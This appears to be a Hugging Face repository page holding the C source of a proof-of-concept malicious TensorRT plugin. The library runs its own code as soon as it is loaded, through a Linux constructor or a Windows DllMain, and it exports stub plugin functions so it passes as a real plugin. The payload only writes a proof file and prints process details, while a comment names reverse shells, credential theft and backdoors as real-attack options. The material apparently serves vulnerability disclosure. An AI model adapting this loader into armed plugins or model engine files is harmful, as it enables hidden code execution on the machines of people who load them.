Hugging Face's logo

treforbenbow
/
tensorrt-engine-rce-poc

Model card Files
xet
 Community
tensorrt-engine-rce-poc
File size: 2,176 Bytes
2774b43
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*
 * Malicious TensorRT Plugin - Proof of Concept
 *
 * This shared library executes arbitrary code when loaded.
 * - Linux: __attribute__((constructor)) runs on dlopen()
 * - Windows: DllMain with DLL_PROCESS_ATTACH runs on LoadLibrary()
 *
 * Both execute BEFORE any TensorRT API interaction.
 *
 * For PoC: creates a proof file and prints to stderr.
 * In a real attack: reverse shell, credential theft, backdoor, etc.
 */

#include <stdio.h>
#include <stdlib.h>

#ifdef _WIN32
#include <windows.h>
#include <process.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        /* PoC: Write proof of execution */
        FILE *f = fopen("C:\\temp\\tensorrt_rce_poc.txt", "w");
        if (!f) f = fopen("tensorrt_rce_poc.txt", "w");
        if (f) {
            fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin LoadLibrary()\n");
            fprintf(f, "PID: %d\n", _getpid());
            fclose(f);
        }
        fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
        fprintf(stderr, "[!] Proof written to tensorrt_rce_poc.txt\n");
        fprintf(stderr, "[!] PID: %d\n\n", _getpid());
    }
    return TRUE;
}

/* TensorRT plugin stubs */
__declspec(dllexport) void setLoggerFinder(void *finder) { (void)finder; }
__declspec(dllexport) void* getCreators(int *n) { if (n) *n = 0; return NULL; }

#else
#include <unistd.h>

__attribute__((constructor))
void malicious_init(void) {
    FILE *f = fopen("/tmp/tensorrt_rce_poc", "w");
    if (f) {
        fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin dlopen()\n");
        fprintf(f, "PID: %d\nUID: %d\n", getpid(), getuid());
        fclose(f);
    }
    fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
    fprintf(stderr, "[!] Proof written to /tmp/tensorrt_rce_poc\n");
    fprintf(stderr, "[!] PID: %d, UID: %d\n\n", getpid(), getuid());
}

/* TensorRT plugin stubs */
void setLoggerFinder(void *finder) { (void)finder; }
void* getCreators(int *n) { if (n) *n = 0; return NULL; }

#endif